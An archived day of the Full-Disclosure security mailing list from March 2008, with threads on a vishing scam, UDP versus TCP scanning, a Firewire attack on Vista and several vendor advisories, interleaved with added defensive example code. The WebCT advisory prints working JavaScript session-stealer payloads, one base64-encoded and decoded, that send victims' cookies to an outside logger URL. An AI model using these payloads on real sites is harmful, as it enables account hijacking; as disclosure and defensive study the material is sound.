Re: [Full-disclosure] lets go vishing

2008-03-05 Thread Michael Simpson
On 3/4/08, lsi [EMAIL PROTECTED] wrote:
 [19:15] lsi2lsi: hiya! ... so i was nearly vished today ...
 [19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB,
/schnip

--from whocallsme.com

I have contacted Adeptra (note spelling) to ask them if they are the
owners of this number.

However, if they have themselves sold the number on to yet another
party, I have asked for the details so we can hunt down who is running
this scam.

Adeptra are based at
Forbury Court,
12 Forbury Road,
Reading, Berkshire, RG1 1SB
Main telephone number is 0118 938 7000
(so I guess Miss Roberts is a direct number (938 7023) at that address).

their website is

www.adeptra.com

have phun

mike

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] WebCT 4.x Javascript Session Stealer Exploits

2008-03-05 Thread Benjamin 'balupton' Lupton
WebCT 4.x Javascript Session Stealer Exploits

Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
Affected Version: 4.1.5.8
Discoverer: Benjamin 'balupton' Lupton
Date Discovered: November 2005
Date Reported: 25/06/2007
Software Author Contacted (again) on: 20/07/2007
Date Published: 05/03/2008

Published At:
http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit
http://www.balupton.com/documents/webct_exploits.txt

Attack Type:
Javascript Session Stealer Exploit.

Description:
Mail & Discussion Board messages are not properly checked for javascript,
allowing javascript to perform a session stealing attack (allowing the
attacker to be logged in as the victim).

Tested On:
Attacks were tested fully on eCentral TAFE's WebCT System in November 2005
(with permission of staff),
and again on Curtin University's WebCT System in June 2006 (but this time
only to see if the javascript will run).

Action Taken:
Contacted TAFE lecturers and administrators, who didn't really care.
Contacted WestOne multiple times, but never received any response.
Then contacted Secunia, which would not publish as the discoverer did not
own their own copy of the software in question.
Published as WebCT is being phased out, with Blackboard being the
replacement.

Steps:
The attacker publishes the exploit code in a message with "Don't wrap text"
enabled.
The victim accesses the attacker's message and their cookies are sent to the
attacker's remote logger.
The attacker then logs into the system and replaces his/her cookies with the
acquired cookies.
- Cookies are formatted as follows within the value attribute:
CookieName=CookieValue; NextCookieName=NextCookieValue;
The attacker is now logged into the system as the victim.
In this case the logger is located here:
http://www.balupton.com/sandbox/logger.php?pass_code=secret_key

Notes:
Victims must be students (attack does not work on non-students, e.g.
teachers/admins).
Attack 2 will also run in Opera, but fails to retrieve the document.cookie
value.
Attack 2 uses a base64 encoded javascript which is executed.
Both attacks can be customized to allow any javascript to run.
Javascript can also be developed to post a mail or discussion board message,
this works for all types of victims.

Resources:
Attack Code: See below
Logger:
http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_source=true
Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In

Attack 1 - IE6SP2 Exploit (Automatic):
<div id="mycode" style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript
session stealer automatic hack
var iframe = document.createElement('iframe');
iframe.style.border = 'none';
iframe.style.height = '1px';
iframe.style.width = '1px';
var url =
'http'+'://www.balupton.com/sandbox/logger.php'
+'?variable=document.cookie'
+'&value='+escape(document.cookie)
+'&url='+escape(document.location)
+'&pass_code=secret_key'
;
iframe.src = url;
document.body.appendChild(iframe);">Thank you</div>


Attack 2 - Firefox Exploit (Manual):
<a
href="data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8g
YmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVy
bCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92
YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29v
a2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVy
cmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9r
ZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=">Click Me!</a>

Attack 2 - Firefox Exploit (Manual) - Decoded:
<script type="text/javascript">
// balupton's javascript session stealer manual hack
var url =
'http://www.balupton.com/sandbox/logger.php'
+'?variable=document.cookie'
+'&value='+escape(document.cookie)
+'&url='+escape(document.referrer ? document.referrer :
'http://exploited_url.com')
+'&pass_code=secret_key'
;
document.location = url;
</script>




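The advisory above boils down to a message board that renders user-posted HTML unchecked, with two evasions that defeat naive filters: a newline inside "java\nscript:" in a CSS url(), and a data: URL carrying base64-encoded script. Added example, not code from the advisory or from WebCT: a server-side audit of posted HTML that normalises URL schemes the way browsers do before checking them, beside the plain escape-on-output fix; the function names and the constructed stand-in payloads are assumptions.

```python
import html
import re
from html.parser import HTMLParser

SAFE_SCHEMES = {"http", "https", "mailto"}
URL_ATTRS = {"href", "src", "action"}
# url(...) arguments inside an inline style; DOTALL because the value may span lines
_CSS_URL = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.I | re.S)


def url_scheme(raw):
    """Scheme of a URL as a browser would read it, or None for a relative URL.
    Browsers drop control characters and whitespace inside the scheme, which is
    why 'java<newline>script:' in Attack 1 runs; strip them before looking."""
    cleaned = re.sub(r"[\x00-\x20]", "", html.unescape(raw)).lower()
    m = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned)
    return m.group(1) if m else None


def url_is_safe(raw):
    scheme = url_scheme(raw)
    return scheme is None or scheme in SAFE_SCHEMES


class MessageAuditor(HTMLParser):
    """Collects the reasons a posted message must not be rendered as raw HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(f"<{tag}> not allowed")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")
            elif name in URL_ATTRS and not url_is_safe(value):
                self.findings.append(f"{name} uses scheme {url_scheme(value)}")
            elif name == "style":
                for _, target in _CSS_URL.findall(value):
                    if not url_is_safe(target):
                        self.findings.append(f"style url() uses scheme {url_scheme(target)}")
                if "expression(" in value.lower():
                    self.findings.append("style uses expression()")


def audit_message(raw_html):
    auditor = MessageAuditor()
    auditor.feed(raw_html)
    auditor.close()
    return auditor.findings


def render_safely(raw_html):
    """The robust fix: store the text and escape it on output, instead of the
    raw-HTML path the 'Don't wrap text' option enabled. Marking the session
    cookie HttpOnly would additionally keep it out of document.cookie."""
    return html.escape(raw_html, quote=True)


# Constructed stand-ins for the advisory's two vectors (not the original payloads)
ATTACK1_LIKE = ('<div id="mycode" style="BACKGROUND: url(\'java\nscript:eval('
                'document.all.mycode.expr)\')" expr="alert(1)">Thank you</div>')
ATTACK2_LIKE = '<a href="data:text/html;base64,PHNjcmlwdD4=">Click Me!</a>'
BENIGN = '<a href="http://example.edu/course">Syllabus</a><img src="/img/logo.png">'
```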

Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread Andrew A
hey dude, how is merely sending a single datagram not going to be faster
than doing an entire handshake?

On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer [EMAIL PROTECTED] wrote:

 This is not true. I doubt there is any measurable advantage
 of UDP vs. TCP scans if you do it right.



Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread Dmitry
dude,  you don't need the entire handshake for tcp scanning.

On Wed, Mar 5, 2008 at 2:54 PM, Andrew A [EMAIL PROTECTED] wrote:

 hey dude, how is merely sending a single datagram not going to be faster
 than doing an entire handshake?

 On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer [EMAIL PROTECTED]
 wrote:

  This is not true. I doubt there is any measurable advantage
  of UDP vs. TCP scans if you do it right.
 
 


Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread Sebastian Krahmer
Hi dude,

On Wed, Mar 05, 2008 at 04:54:16AM -0800, Andrew A wrote:

 hey dude, how is merely sending a single datagram not going to be faster
 than doing an entire handshake?
First, to know whether a TCP port is open you do not need
a complete handshake. A single TCP packet is enough.
I doubt that a single TCP packet is slower than a single UDP
packet.
Second, you may need to send multiple (same) UDP packets
since the remote peer's rate limiting does not send you back ICMPs;
all due to the unreliable nature of UDP.

But the most important thing is, that if you do it large scale*,
you have to wait for some sort of reply anyways,
either TCP SYN|ACK or some application data. This time of waiting
can be used to SYN/request yet another 10,000 hosts.
Thus, how fast a scanner is does not depend on UDP or TCP,
it depends on the upper protocols. Even complex protocols
such as SSH can be spoken very quickly and only require a little
more time (if at all) than walking a couple of SNMP OIDs per host.
10,000+ hosts/s for a common application TCP protocol such as HTTP
is easy.

Do not bash me if a UDP app scan takes 10 minutes to succeed
and I need 11; we are talking about *differences* :-)

* speaking about application level which needs some
  request/responses in both, UDP and TCP, cases

regards,
Sebastian

-- 
~
~ perl self.pl
~ $_='print\$_=\47$_\47;eval';eval
~ [EMAIL PROTECTED] - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)



Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread Enno Rey
Hi,

 all due to the unreliable nature of UDP.
 
 But the most important thing is, that if you do it large scale*,
 you have to wait for some sort of reply anyways,
 either TCP SYN|ACK or some application data. This time of waiting
 can be used to SYN/request yet another 10,000 hosts.
 Thus, how fast a scanner is does not depend on UDP or TCP,
 it depends on the upper protocols.

it mainly depends on the implementation of the scanner.
We did some large scale internet SNMP scanning some time ago
[see http://www.ernw.de/content/e7/e181/e671/download690/ERNW_026_SNMP_HitB_Dubai_2007_ger.pdf]
and used our own scanning tool [http://www.ernw.de/download/snmpattack.pl].
Within the different releases of the tool there were _big_ differences in
scanning speed.

thanks,

Enno

-- 
Enno Rey

Check out www.troopers08.org!


ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey



[Full-disclosure] Goolag Perk and Annoyance

2008-03-05 Thread Times Enemy
Greetings.

I preface that this is not a discovery, but rather a simple observation.

http://www.goolag.org

I am finding that it takes only a few seconds for Google to block query
requests, BY IP!  With this in mind, Goolag Scanner is actually an
effective annoyance tool against large networks.  Simply conduct a
Goolag Scan from a heavily populated network, with a couple hundred
Dorks, and anyone who uses the same public IP address which was used for
the Goolag Scan will have to go through an extra CAPTCHA step to finish
their Google queries.  If they use a Google toolbar of some sort, Google
may not even offer them a CAPTCHA option to continue with the search query.

Within most corporate networks, what effective methods can be used,
from the network's perspective, to block mass Google queries?

.te



Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread sub
That single UDP datagram is definitely faster. Compare the Code Red
worm to Sapphire (SQL Slammer), for instance:

Previous scanning worms, such as Code Red, spread via many threads,
each invoking connect() to probe random addresses. Thus each thread's
scanning rate was limited by network latency, the time required to
transmit a TCP-SYN packet and wait for a response or timeout. In
principle, worms can compensate for this latency by invoking a
sufficiently large number of threads. However, in practice, context
switch overhead is significant and there are insufficient resources to
create enough threads to counteract the network delays -- the worm
quickly stalls and becomes latency limited.

In contrast, Sapphire's scanner was limited by each compromised
machine's bandwidth to the Internet. Since the SQL Server
vulnerability was exploitable using a single packet to UDP port 1434,
the worm was able to send these scans without requiring a response
from the potential victim.

* http://www.caida.org/publications/papers/2003/sapphire/sapphire.html

(Oops, sorry for the copy to your inbox, Andrew.)

On 3/5/08, Andrew A [EMAIL PROTECTED] wrote:
 hey dude, how is merely sending a single datagram not going to be faster
 than doing an entire handshake?

 On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer [EMAIL PROTECTED] wrote:

  This is not true. I doubt there is any measurable advantage
  of UDP vs. TCP scans if you do it right.
 
 



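Sebastian's point earlier in this thread (a scanner overlaps its waiting time across thousands of hosts, so what goes on the wire is one SYN or one UDP datagram per host) and sub's Slammer citation describe the same trace a defender sees: a single source touching many destinations with one packet each and no completed handshake. Added example, not written by any poster in this thread: a sliding-window detector over constructed flow records that flags both bare-SYN and single-datagram UDP/161 sweeps; the Flow fields, thresholds and addresses are all assumptions.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float      # flow start, seconds
    src: str
    dst: str
    proto: str     # "tcp" or "udp"
    dport: int
    flags: str     # TCP flags sent by src over the whole flow ("" for udp)
    packets: int   # packets sent by src


def is_probe(f: Flow) -> bool:
    """One-packet flows are the signature of both styles argued over above:
    a lone SYN that never completes the handshake, or a single UDP datagram."""
    if f.proto == "tcp":
        return f.flags == "S" and f.packets == 1
    return f.proto == "udp" and f.packets == 1


def probe_kind(f: Flow) -> str:
    return "tcp_syn" if f.proto == "tcp" else f"udp/{f.dport}"


def detect_sweeps(flows, window=60.0, threshold=50):
    """Map each source that probes at least `threshold` distinct destinations
    within any `window` seconds to its peak count and the probe kinds seen."""
    by_src = defaultdict(list)
    for f in flows:
        if is_probe(f):
            by_src[f.src].append(f)
    alerts = {}
    for src, probes in by_src.items():
        probes.sort(key=lambda p: p.ts)
        live = Counter()     # distinct destinations inside the sliding window
        lo, peak = 0, 0
        for f in probes:
            live[f.dst] += 1
            while f.ts - probes[lo].ts > window:   # expire probes older than the window
                old = probes[lo].dst
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                lo += 1
            peak = max(peak, len(live))
        if peak >= threshold:
            alerts[src] = {"peak_distinct_dsts": peak,
                           "kinds": dict(Counter(probe_kind(p) for p in probes))}
    return alerts


def constructed_flows():
    """Constructed sample: an SNMP sweep, a SYN sweep, and an ordinary client."""
    flows = []
    # 200 hosts hit with one UDP/161 datagram each inside two seconds
    for i in range(200):
        flows.append(Flow(100.0 + i / 100, "10.0.0.5", f"10.1.{i // 256}.{i % 256}",
                          "udp", 161, "", 1))
    # 80 hosts hit with a bare SYN to 22/tcp, spread over 40 seconds
    for i in range(80):
        flows.append(Flow(200.0 + i / 2, "192.0.2.9", f"10.2.0.{i + 1}",
                          "tcp", 22, "S", 1))
    # a normal client: completed handshakes, many packets, a handful of servers
    for i in range(5):
        flows.append(Flow(300.0 + i, "10.0.0.7", f"10.3.0.{i + 1}",
                          "tcp", 443, "SPA", 12))
    return flows
```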

[Full-disclosure] Firewire Attack on Windows Vista

2008-03-05 Thread Bernhard Mueller
Hello,

In the light of recent discussions about firewire / DMA hacks, we would
like to throw in some of the results of our past research on this topic
(done mainly by Peter Panholzer) in the form of a short whitepaper. In
this paper, we demonstrate that the firewire unlock attack (as
implemented in Adam Boileau's winlockpwn) can be used against Windows
Vista.

The paper is available at:

http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf


Best regards, 

Bernhard


-- 
_

Bernhard Mueller
Security Consultant

SEC Consult Unternehmensberatung GmbH
www.sec-consult.com

A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax   +43 1 8903043 15
mobile+43 676 840301 718
email [EMAIL PROTECTED]

Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt

Advisor for your information security.


Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread KJK::Hyperion
sub wrote:
 Previous scanning worms, such as Code Red, spread via many threads,
 each invoking connect() to probe random addresses.

what the hell is this? visiting the iniquity of the applications upon 
the protocols? Winsock is probably the only API that lets you connect() 
asynchronously (via the non-standard ConnectEx extension, but still). 
And if you have access to raw sockets, the whole point is moot because 
(IIRC) the advantages of SYN cookies work both ways

(Oops, sorry for the copy to your inbox, sub. Blame the mailing list
administrators, Thunderbird's clunky UI and my laziness)



Re: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!

2008-03-05 Thread sub
No, but if you're querying the services for data you do.

On 3/5/08, Dmitry [EMAIL PROTECTED] wrote:
 dude,  you don't need the entire handshake for tcp scanning.





[Full-disclosure] [ MDVSA-2008:058 ] - Updated openldap packages fix multiple vulnerabilities

2008-03-05 Thread security

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:058
 http://www.mandriva.com/security/
 ___
 
 Package : openldap
 Date: March 5, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A vulnerability was found in slapo-pcache in slapd of OpenLDAP prior
 to 2.3.39 when running as a proxy-caching server.  It would allocate
 memory using a malloc variant rather than calloc, which prevented
 an array from being properly initialized and could possibly allow
 attackers to cause a denial of service (CVE-2007-5708).
 
 Two vulnerabilities were found in how slapd handled modify (prior
 to 2.3.26) and modrdn (prior to 2.3.29) requests with NOOP control
 on objects stored in the BDB backend.  An authenticated user with
 permission to perform modify (CVE-2007-6698) or modrdn (CVE-2008-0658)
 operations could cause slapd to crash.
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6698
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658
 ___
 
 Updated Packages:
 

Re: [Full-disclosure] Firewire Attack on Windows Vista

2008-03-05 Thread Thierry Zoller
Dear All,
That said the original work on this from metlstorm is in the news [1]
and can be found here  : http://storm.net.nz/projects/16

[1] http://it.slashdot.org/article.pl?sid=08/03/04/1258210from=rss
-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



[Full-disclosure] ERRATA: [ GLSA 200801-09 ] X.Org X server and Xfont library: Multiple vulnerabilities

2008-03-05 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE]          GLSA 200801-09:03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: X.Org X server and Xfont library: Multiple vulnerabilities
      Date: January 20, 2008
   Updated: March 05, 2008
      Bugs: #204362, #208343
        ID: 200801-09:03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The previous version of the X.Org X server (1.3.0.0-r4) did not
properly address the integer overflow vulnerability in the MIT-SHM
extension (CVE-2007-6429). It failed to check on Pixmaps of certain
bit depths.

All users of the X.Org X server package should upgrade to
x11-base/xorg-server-1.3.0.0-r5.

The corrected sections appear below.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  x11-base/xorg-server       < 1.3.0.0-r5              >= 1.3.0.0-r5
  2  x11-libs/libXfont          < 1.3.1-r1                >= 1.3.1-r1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Resolution
==========

All X.Org X server users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-1.3.0.0-r5"

All X.Org Xfont library users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=x11-libs/libXfont-1.3.1-r1"

References
==========

  [ 1 ] CVE-2007-5760
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5760
  [ 2 ] CVE-2007-5958
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5958
  [ 3 ] CVE-2007-6427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6427
  [ 4 ] CVE-2007-6428
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6428
  [ 5 ] CVE-2007-6429
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6429
  [ 6 ] CVE-2008-0006
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0006
  [ 7 ] X.Org security advisory
http://lists.freedesktop.org/archives/xorg/2008-January/031918.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200801-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200803-10 ] lighttpd: Multiple vulnerabilities

2008-03-05 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: lighttpd: Multiple vulnerabilities
      Date: March 05, 2008
      Bugs: #211230, #211956
        ID: 200803-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in lighttpd.

Background
==========

lighttpd is a lightweight high-performance web server.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  www-servers/lighttpd        < 1.4.18-r2                >= 1.4.18-r2

Description
===========

lighttpd contains a calculation error when allocating the global file
descriptor array (CVE-2008-0983). Furthermore, it sends the source of a
CGI script instead of returning a 500 error (Internal Server Error)
when the fork() system call fails (CVE-2008-).

Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial
of Service or gain the source of a CGI script.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All lighttpd users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/lighttpd-1.4.18-r2"

References
==========

  [ 1 ] CVE-2008-0983
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0983
  [ 2 ] CVE-2008-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [USN-583-1] Evolution vulnerability

2008-03-05 Thread Kees Cook
===========================================================
Ubuntu Security Notice USN-583-1             March 05, 2008
evolution vulnerability
CVE-2008-0072
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  evolution   2.6.1-0ubuntu7.2

Ubuntu 6.10:
  evolution   2.8.1-0ubuntu4.2

Ubuntu 7.04:
  evolution   2.10.1-0ubuntu2.1

Ubuntu 7.10:
  evolution   2.12.1-0ubuntu1.1

After a standard system upgrade you need to restart Evolution to effect
the necessary changes.

Details follow:

Ulf Harnhammar discovered that Evolution did not correctly handle format
strings when processing encrypted emails.  A remote attacker could exploit
this by sending a specially crafted email, resulting in arbitrary code
execution.




[Full-disclosure] Multiple vulnerabilities in Perforce Server 2007.3/143793

2008-03-05 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Perforce Server
  http://www.perforce.com
Versions:     <= 2007.3/143793
Platforms:Windows, Unix, Linux and Mac
Bugs: NULL pointers, invalid memory access and endless loop
Exploitation: remote
Date: 05 Mar 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


From vendor's website:
Perforce SCM (Software Configuration Management) versions and manages
source code and digital assets for enterprises large and small.


###

===
2) Bugs
===


The Perforce server is affected by multiple vulnerabilities which
allow any unauthenticated attacker to crash the server or consume all
its resources.

The first type of vulnerabilities includes the NULL pointers generated
by the absence of some parameters in the client's request and the lack
of checks on the pointers returned by the functions which get these
values from the packets.

The commands affected by these NULL pointer vulnerabilities are the
following: dm-FaultFile, dm-LazyCheck, dm-ResolvedFile, dm-OpenFile,
crypto and possibly others.

A second type of vulnerability is exploitable through the
server-DiffFile and server-ReleaseFile commands; in this case the
problem is caused by a 32-bit number provided by the client which is
used as the number of elements when initializing an array.

Another problem is exploitable, again with a malformed
server-DiffFile command, and allows forcing the server into an endless
loop which will cause its termination after it has consumed all the
memory and resources of the system.
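The three bug classes described above (a missing parameter that yields a NULL pointer, a client-chosen 32-bit count that sizes an array, and a loop that never terminates) handled defensively in one request handler, added here as an illustration; it is not the PoC code linked below nor Perforce's source, and the "key=value;" request format, the field names and the MAX_ELEMS bound are constructed for the example.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed toy request format for this example: "key=value;key=value".
   It is not Perforce's wire protocol; the handler only exercises the three
   failure classes the advisory lists. */
typedef struct { const char *ptr; size_t len; } field_t;

enum { REQ_MISSING_PARAM = -1, REQ_BAD_COUNT = -2, REQ_TRUNCATED = -3 };
#define MAX_ELEMS 4096u   /* assumed sane upper bound for one request */

/* Find "name=" at the start of a pair. Returns 1 and fills *out, or 0 when the
   parameter is absent; the caller must treat 0 as a protocol error instead of
   dereferencing a NULL result (bug class 1). */
static int lookup(const char *req, const char *name, field_t *out)
{
    size_t nlen = strlen(name);
    const char *p = req;
    while (*p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            out->ptr = p + nlen + 1;
            const char *end = strchr(out->ptr, ';');
            out->len = end ? (size_t)(end - out->ptr) : strlen(out->ptr);
            return 1;
        }
        const char *next = strchr(p, ';');
        if (!next) break;
        p = next + 1;
    }
    return 0;
}

/* Parse an unsigned decimal field: digits only, no wrap-around (bug class 2). */
static int parse_count(const field_t *f, uint32_t *out)
{
    uint64_t v = 0;
    if (f->len == 0 || f->len > 10) return 0;   /* 10 digits cover UINT32_MAX */
    for (size_t i = 0; i < f->len; i++) {
        if (!isdigit((unsigned char)f->ptr[i])) return 0;
        v = v * 10 + (uint64_t)(f->ptr[i] - '0');
    }
    if (v > UINT32_MAX) return 0;
    *out = (uint32_t)v;
    return 1;
}

/* Handle one request. Returns the sum of the parsed elements (>= 0) on
   success, or one of the negative REQ_* codes. */
int64_t handle_request(const char *req)
{
    field_t file, count, data;
    /* Bug class 1: a missing parameter is rejected, never dereferenced. */
    if (!lookup(req, "file", &file) || !lookup(req, "count", &count) ||
        !lookup(req, "data", &data))
        return REQ_MISSING_PARAM;

    /* Bug class 2: the client-supplied 32-bit count sizes an array, so bound
       it before it reaches the allocator (huge = memory exhaustion). */
    uint32_t n;
    if (!parse_count(&count, &n) || n == 0 || n > MAX_ELEMS)
        return REQ_BAD_COUNT;
    uint32_t *arr = calloc(n, sizeof *arr);
    if (!arr) return REQ_BAD_COUNT;

    /* Bug class 3: the fill loop is bounded by n AND by the input length and
       aborts when the parser makes no progress, so malformed data cannot
       spin the server forever. */
    const char *p = data.ptr, *end = data.ptr + data.len;
    int64_t sum = 0;
    for (uint32_t i = 0; i < n; i++) {
        char *stop;
        if (p >= end) { free(arr); return REQ_TRUNCATED; }
        unsigned long v = strtoul(p, &stop, 10);
        if (stop == p || stop > end) { free(arr); return REQ_TRUNCATED; }
        arr[i] = (uint32_t)v;
        sum += arr[i];
        p = stop;
        if (p < end && *p == ',') p++;
    }
    free(arr);
    return sum;
}

int main(void)
{
    const char *good = "cmd=server-DiffFile;file=a.c;count=3;data=1,2,3";
    const char *huge = "cmd=server-DiffFile;file=a.c;count=4294967295;data=1";
    printf("good request: %lld\n", (long long)handle_request(good));   /* 6 */
    printf("huge count:   %lld\n", (long long)handle_request(huge));   /* -2 */
    return 0;
}
```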


###

===
3) The Code
===


http://aluigi.org/poc/perforces.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org



[Full-disclosure] [ MDVSA-2008:059 ] - Updated tcl packages fix vulnerability

2008-03-05 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:059
 http://www.mandriva.com/security/
 ___
 
 Package : tcl
 Date: March 5, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A flaw in the Tcl regular expression handling engine was originally
 discovered by Will Drewry in the PostgreSQL database server's Tcl
 regular expression engine.  This flaw can result in an infinite loop
 when processing certain regular expressions.
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4772
 ___
 
 Updated Packages:
 

